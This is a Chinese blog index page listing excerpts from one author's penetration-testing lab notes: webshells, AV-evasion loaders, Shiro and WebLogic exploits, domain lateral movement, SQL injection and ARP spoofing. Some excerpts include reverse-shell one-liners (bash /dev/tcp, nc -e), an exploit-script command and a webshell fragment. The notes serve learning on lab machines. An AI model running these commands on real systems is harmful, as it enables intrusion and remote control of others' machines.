自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(38)
  • 收藏
  • 关注

原创 kali 安装 蚁剑

一、下载地址1.1 源码下载假设创建了个 antsword 文件夹则在该文件夹下下载源码:git clone https://github.com/AntSwordProject/antSword.git赋予可写权限: chmod 644 antSword-master1.2 加载器下载在 antsword/ 目录下 下载加载器加载器下载地址:https://github.com/AntSwordProject/AntSword-Loader二、安装步骤2.1 加载器处理1、解压

2021-03-01 21:14:29 4276 1

原创 文件上传总结

一、前言之前没好好总结,打算复习下并总结下环境: upload-labsupload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上传方式。二、测试2.1 Pass-01重点:前端JS方法绕过2.2 Pass-02重点:数据包文件类型检测绕过php ——> application/octet-streamjpg ——> image/jpeg2

2021-02-25 20:10:13 324

原创 Cobalt Strike 和 MSF 免杀上线

一、项目老哥们,方便的话,给个star吧!BypassAVVT查杀效果良好!!!大家可以去github上 git下来使用,这里就介绍下具体使用二、操作2.1 CS 上线1、生成 C 语言格式的payload payload.c(使用前,最好先测试下生成的payload是否可用!这里推荐k8gege的shellcodeLoader工具)坑:选择 x64 经常无法上线!!!2、利用 Filehandle.py 处理 shellcode替换自己的shellcode文件路径——&gt

2021-02-01 11:12:48 1647 2

原创 Apache Shiro漏洞检测(CVE-2016-4437)

一、环境1.1 环境搭建vulhub搭建【注: 此博客只做学习记录,原理请自行百度**】**这里贴一篇吧1.2 工具python版本:https://github.com/insightglacier/Shiro_exploit二、操作记录2.1 执行 touch 命令# 在 /tmp 目录下 创建 test.txtpython2 shiro_exploit.py -t 3 -u http://192.168.47.162:8080 -p "touch /tmp/test.txt"

2021-01-20 21:06:42 1055

原创 weblogic 漏洞复现(1)

一、环境搭建# 这里采用 vulhub/weblogic 的漏洞镜像搭建docker pull vulhub/weblogic:12.2.1.3-2018# 端口映射docker run -di -p 7001:7001 -p 8055:8055 vulhub/weblogic:12.2.1.3-2018二、漏洞信息收集工具地址# 发现版本信息WebLogic Server 版本: 12.2.1.3.0# 漏洞信息CVE-2018-2894 #影响版本 weblogic

2020-12-04 11:42:39 760

原创 记录下 linux反弹shell 左右键切换 乱码问题

本地主机: nc -lvnp 2323测试主机:bash -i >& /dev/tcp/10.1.1.1/2323 0>&1交互式 shell : python -c 'import pty;pty.spawn("/bin/bash")'解决方法:1、 Ctrl+Z 将当前进程 放 后台运行2、stty -echo raw3、fg %1 # 将前面的放入后台运行的进程 1 ,放在前台运行补充 linux 命令1. command& 让进程

2020-11-30 22:06:50 1141

原创 域环境里-反弹meterpreter

一、背景1.1 前提域渗透 part1域渗透 part2假设在win7中成功制作了 黄金票据,接下来则: 1、上传木马msf6.exe 到win2008 DC 上; 2、利用 schtasks 计划任务,执行木马 反弹shell; 3、也可以通过 sc 命令,创建服务 反弹 shell。二、计划任务反弹shell1、msf6.exe已经成功上传至 win7 上;2、利用 TGT 伪造身份 将 msf6.exe 上传至 DC主机上;copy c:\msf6.exe \\WIN-USL

2020-11-13 18:23:37 361 2

原创 记一次简单域渗透(part 2)

一、前提信息part 2 主要是讲解内网渗透中 PTH PTT 攻击!!! (前提:我们无法获取到内网域用户的明文密码!)结合 part 1 的过程分析,可总结以下基本信息:1.1 环境域:learn.com操作系统类型 IP地址 本地账户/密码 域账户/密码 角色Windows 2008 R2 192.168.138.129 Administrator/ learn\Administrator

2020-11-13 13:16:04 994

原创 记一次简单域渗透(part 1)

一、环境域环境是自己搭的,基本模仿的企业部署域:learn.com操作系统类型 IP地址 本地账户/密码 域账户/密码 角色Windows 2008 R2 192.168.138.129 Administrator/ learn\Administrator DC域控 win@2008.com win@2008.com

2020-11-12 16:13:27 2189 5

原创 SQL注入之【报错注入】

一、原理1.1 使用位置一般是在页面没有显示位、但用echo mysql_error();输出了错误信息限制:不能用group_concat(),只能用limit依次猜解1.2 相关函数floor()1、floor()floor()是取整数rand()在0和1之间产生一个随机数rand(0)*2将取0到2的随机数floor(rand()*2)有两条记录就会报错floor(rand(0)*2)记录需为3条以上,且3条以上必报错,返回的值是有规律的count(*)是用来统计结果的,相

2020-09-27 19:38:43 447

原创 【VulnHub系列】AI-Web-1 漏洞提权

一、环境靶机: https://www.vulnhub.com/entry/ai-web-1,353/攻击机: kali二、具体步骤2.1 主机发现nmap -sP ip段2.2 端口服务扫描nmap -sV -A -p- 192.168.47.152Not shown: 65534 closed portsPORT STATE SERVICE VERSION80/tcp open http Apache httpd| http-robots.txt: 2 disal

2020-07-12 19:49:56 677

原创 利用Metasploit Framework(msf)进行内网(域)渗透

只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!!内网进行端口扫描:use auxiliary/scanner/portscan/tcp use exploit/windows/smb/ms08_067_netapi

2020-07-03 21:23:07 5476

原创 hackthebox的邀请码获取(详细步骤!!!)

一、背景在一个安全交流群里,有位同学发出这样一个链接给我https://www.hackthebox.eu/invite页面提示如果能 Hack 进去,那么就能获取邀请码!二、操作步骤如果你只是想拿这个邀请码,那就直接这样:1、访问:https://www.hackthebox.eu/invite2、在控制台输入$.post('https://www.hackthebox.eu/api/invite/generate',function(data){console.log(data)})

2020-06-15 20:20:26 4557 2

原创 Windows提权

一、环境靶机:Windows系统 (文章里用的:Win2003)攻击机:python2环境 (文章里用的:Centos7)二、准备2.1 前提已经获得了目标服务器的普通权限!!!e.g. 通过一句话木马。2.2 工具准备1、在攻击机上安装:python2环境下载 xlrd 包: pip install xlrd2、下载 Windows-Exploit:https://github.com/AonCyberLabs/Windows-Exploit-Suggester三、提权1

2020-06-04 20:39:36 585

原创 hydra 使用介绍

一、环境二、命令介绍查看 hydra 帮助信息:hydra -h...支持在线破解的服务协议:Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest

2020-05-30 10:44:22 23464 1

原创 linux系统常用命令利用——反弹shell

一、环境Aliyun Linux (192.168.47.136)Metasploitable2 Linux (192.169.47.133)目的: 将Metasploitable 的 shell 反弹给 Aliyun二、具体实操2.1 通过 linux 命令 NC1、首先 Aliyun 侦听某个端口 如 4444 端口nc -nvlp 44442、Meta..上执行:nc -e /bin/bash 192.168.47.136 44442.2 通过bash命令1、首先 Ali

2020-05-19 14:44:57 384

原创 kali 密码嗅探(arpspoof、ettercap-graphical)

一、环境目标主机:Win2003IP:192.168.47.123MAC: 攻击机:kaliIP: 192.168.47.147MAC: 00:0c:29:5d:9d:90网关:IP: 192.168.47.2MAC: 0:50:56:ee:63:d5二、ARP欺骗2.1 开启 kali 路由功能改文件(/proc/sys/net/ipv4/ip_forward)参数:echo 1 > /proc/sys/net/ipv4/ip_forward2.2 开始欺骗ar

2020-05-19 10:30:10 2448 1

原创 【记】linux 安装 git-2.9.0

总是百度,看别人的有点麻烦!!!自己经常安,还是自己记录下吧!一、下载包下面是从官网下载地址:git-2.9.0.tar.gz我的系统 Aliyun-linuxwget https://mirrors.edge.kernel.org/pub/software/scm/git/git-2.9.0.tar.gz二、安装1、下载依赖包yum install curl-devel expat-devel gettext-devel openssl-devel zlib-devel gcc perl

2020-05-18 16:10:30 493

原创 linux系统安装msf

还是自己写下安装过程吧!我的服务器系统是 Aliyun linux1、下载安装curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall可能报错:Cou

2020-05-17 10:28:44 7174 4

原创 php.ini-Web安全配置问题

一、环境Win2003phpstudy:php 5.2.17二、相关知识2.1 魔术引号 magic_quotes_gpcmagic_quotes_gpc = On:功能:单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线,可预防SQL注入2.2 safe_modesafe_mode = On:当一个web服务器上运行的php打开了安全模式,那么一些函数将被完全的禁止,并且会限制一些可用的功能。受限函数:chdir, move_upload

2020-05-09 17:49:26 290

原创 PHP代码审计

代码审计场景:网站: ——>熊孩CMS公开版搭建环境: Win2003、phpstudy一、具体操作1.2 测试SQL访问:http://192.168.47.122:8080/?r=content&cid=5进一步测试 :http://192.168.47.122:8080/?r=content&cid=5%27%20and%201=1%20#直接查...

2020-05-06 16:04:34 186

原创 冰蝎常规使用

环境搭建Web服务器: 本地 win2003(phpstudy搭建)攻击工具: 冰蝎+kali具体实施步骤1、上传webshell原理参考——>点击和普通一句话木马类似,需要连接密码。此处为 pass<?php@error_reporting(0);session_start();if (isset($_GET['pass'])){ $key=substr...

2020-04-24 11:30:15 20841 1

原创 sql注入——时间盲注

场景sql-labs:Less-8 盲注一、主要运用的mysql语法if(condition,A,B) 如果条件 condition 为 true , 则执行语句A 否则执行语句B以下语句中涉及到的 left() substr() ascii()...等函数解释,点击下面的链接!(就不重写了哈)其他基础语法解释参照——>mysql> select if(1<2,...

2020-04-14 11:14:16 503

原创 sql注入——布尔盲注

场景sql-labs中的 Less-8一、主要运用的mysql语法:count()函数:统计查询结果的数量;length(str)函数:返回字符串 str的长度;left()函数: left(database(),1)='s' left(a,b)从左侧截取a的前b位,正确则返回1,错误返回0 left((select database()),1)='s' 同...

2020-04-12 11:01:40 562

原创 HTTPS攻击(SSL/TLS中间人攻击)

一、场景环境攻击机: kali目标机: WinServer 2003二、原理攻击前提:客户端已经信任伪造证书颁发机构;攻击者控制了核发证书颁发机构;客户端程序禁止了显示证书错误告警信息;攻击者已经控制客户端,并强制其信任伪造证书。角色: 客户端、客户路由器、真实服务器、攻击者代理服务器(攻击者代理服务器)攻击者 通过ARP欺骗客户端通过攻击者做网关,数据包通过攻击者发出。此...

2020-03-01 12:19:17 2839

原创 CVE-2020-1938(apache tomcat AJP漏洞)漏洞复现

nmap 扫描目标主机发现tomcat开放了8009 ajp13端口利用现有EXP进行读取:1、在服务器 /usr/local/tomcat/apache-tomcat-8.5.32/webapps/ROOT目录下创建一个测试实例 test.txt内容为:AAAAAAAAAAAAAAAA2、在攻击机上运行EXP读取 WEB-INF/web.xml 配置信息影响版本范围Ap...

2020-02-21 22:18:41 1243

原创 SQL注入常用语法(sqli-labs-less1-3)

以sqli-labs:less1-3为例less-1(字符型注入)主要代码:<?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variables if(isset($_GET['id...

2020-02-12 17:02:51 347

原创 python 爬虫案例(数据2000+)

python爬取“大乐透”往期数据网页分析构造请求头,获取soup#只是获取单页的内容import requestsimport reimport pandasfrom bs4 import BeautifulSoupheaders = { 'user-agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/53...

2020-01-06 19:07:27 1360

原创 XSS——反射型原理和利用

工具服务器——metasploitable2被攻击机——windows(任意)攻击机——kali环境——DVWA反射型XSS原理通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端 的攻击。攻击目标: web客户端(主要是利用客户端浏览器来运行恶意脚本)主要脚本语言: javascript条件:服务器对用户提交数据过滤不严格web站点能够返回用户输入的 数据(脚本)...

2019-11-29 14:38:54 5631

原创 sqlmap写入一句话木马

工具靶机——metasploitable2攻击机——kali环境——Mutillidae菜刀——蚁剑主要参数sqlmap参数: --file-read=RFILE Read a file from the back-end DBMS file system 从后端的数据库管理系统文件系统读取文件 --file-write=WFILE Write a ...

2019-11-26 19:24:19 10862

原创 SQL注入一句话木马(load_file/out file)

工具靶机——metasploitable2环境——DVWA,(low等级下)菜刀——蚁剑权限查看查看mysql是否有对函数load_file(),outfile()函数的限制(securefilepriv的值是否为NULL)show global variables like '%secure%';NULL 表示不可用, 空 表示可用' order by 2-- 查看字段...

2019-11-26 19:13:59 8779

原创 SQL手工注入原理(二)

工具靶机——metasploitable2WebApplication——DVWASQL手工注入原理(一)SQL盲注应用场景web服务器不显示数据库内建的报错信息(内建的报错信息帮助开发人员发现和修复问题)当程序员隐藏了数据库内建报错信息,替换为通用的错误提示,sql注入将无法依据报错信息判断注入语句的执行结果——盲...

2019-11-20 13:15:53 369

原创 DVWA【Command Execution】命令注入模块

一、工具靶机 Metasploitable2WebApplication——DVWA菜刀——蚁剑二、原理及条件原理: 是指在某些需要输入数据的位置,还构造了恶意的代码破坏了原先的语句结构。而系统缺少有效的过滤,最终达到破坏数据、信息泄露甚至掌控电脑的目的。(通过web程序,在服务器上拼接系统命令)注入条件:web应用程序调用可执行系统命令的函数执行系统命令的函数或函数的参数可控...

2019-11-18 21:55:15 405

原创 SQL手工注入原理(一)

原理服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。靶机metasploitable2DVWA ( mysql 数据库)注入类型分类主要分为 数字型 字符型基于布尔注入and 和 or首先来分析下完整的SQL语句:select fist_name,surname from users where id="1"为了方便,我把 "...

2019-11-17 11:13:56 1194

原创 记【phpMyAdmin默认安装漏洞】

一、工具BrupSuitkali靶机 Metasploitable2只要是基于php-mysql 的服务器(靶机) 一般都可尝试去查看是否存在这个漏洞二、 /setup 目录mysql默认安装是会产生 /phpMyAdmin 这个目录, 而这个目录下有个 /setup 目录这个目录可以在不登入的情况下访问,并对服务器的数据库进行配置e.g.基于安全考虑,一般服务器在配置好数据...

2019-11-11 21:17:14 3336

原创 蚁剑+DVWA“文件包含”漏洞(File Inclusion + Upload 漏洞)

一、实验环境+工具环境搭建:VMware WorkstationOWASP-bwa工具AntSword二、具体步骤演示2.1 打开虚拟机并登入 DVWA这次还是在 low等级下 (其他 security 只是绕过问题,不影响操作解释)解释 文件包含 include 在C语言中文件包含是指一个源文件可以将另一个源文件的全部内容包含进来。该命令的作用是在预编译时,...

2019-10-30 19:06:39 2093

原创 蚁剑+DVWA(文件上传漏洞Upload)

蚁剑+DVWA(文件上传漏洞Upload)工具虚拟机:owasp-bwa主机:windows10蚁剑 AntSword文件上传漏洞(Upload)第一步:登入DVWA注:这里使用的是low等级,毕竟目的是演示如何蚁剑的连接第二步:准备hack.php<?php@eval($_POST['hack'])?>第三步:从DVWA上传hack.php显示上传成功!...

2019-10-30 17:36:04 6129 3

原创 Python(re+urllib)在eclipse环境下爬取网络小说(多级爬取)

python在eclipse环境下的爬虫 用到的包: import re import urllib.request 运用正则需要这个jieba库哦 不足之处,希望各位帮忙指出 谢谢啦!思路首先明确目标: -得到每一章的标题 -得到每一章的内容网页链接(url):https://xs.sogou.com/list/6232872035/ 分析网页源代码可知 该...

2018-09-24 17:55:33 742

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除